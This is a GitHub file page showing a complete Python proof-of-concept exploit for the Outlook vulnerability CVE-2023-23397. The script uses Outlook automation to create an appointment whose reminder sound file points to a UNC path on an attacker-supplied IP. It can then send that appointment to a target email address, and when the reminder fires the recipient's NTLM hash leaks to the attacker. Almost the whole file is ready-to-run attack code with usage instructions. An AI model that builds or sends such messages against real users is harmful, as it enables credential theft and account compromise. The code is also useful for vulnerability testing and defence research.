-
Notifications
You must be signed in to change notification settings - Fork 4
/
Exploit.py
63 lines (57 loc) · 2.28 KB
/
Exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
#!/usr/bin/python3
# PoC for CVE-2023-23397 v1.2
# Copyright (C) 2022 - Gianluca Tiepolo, Maria Saleri
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# Usage: python Exploit.py <save_or_send> <target email> <attacker_ip>
import win32com.client
import sys, datetime, os, argparse
def saveMail(appt):
exportPath = 'malicious.msg'
appt.SaveAs(os.path.abspath(exportPath))
print("[*] Finished, saved to", os.path.abspath(exportPath))
def sendMail(appt):
appt.Send()
print("[*] Finished, e-mail sent!")
def generateMail(cmd, target, c2):
outlook = win32com.client.Dispatch("Outlook.Application")
appt = outlook.CreateItem(1) # AppointmentItem
print("[*] Generating malicious e-mail...")
output_date = datetime.datetime.now().strftime("%Y-%m-%d %H:%M")
appt.Start = output_date # yyyy-MM-dd hh:mm
appt.AllDayEvent = True
appt.Subject = "Testing CVE-2023-23397"
appt.body = "Thank you for your hash!"
appt.Location = "TeamRocket"
appt.MeetingStatus = 1
appt.Recipients.Add(target)
appt.ReminderOverrideDefault = True
appt.ReminderPlaySound = True
appt.ReminderSoundFile = "\\\\" + c2
if cmd == "save":
saveMail(appt)
elif cmd == "send":
sendMail(appt)
else:
print("[!] Unrecognized command, exiting...")
exit(1)
def main():
if len(sys.argv) != 4:
print("Usage: python Exploit.py <save_or_send> <target_email> <attacker_ip>")
sys.exit(0)
print('[*] CVE-2023-23397 v1.2 by Tiepolo G, Saleri M')
generateMail(sys.argv[1], sys.argv[2], sys.argv[3])
if __name__ == "__main__":
main()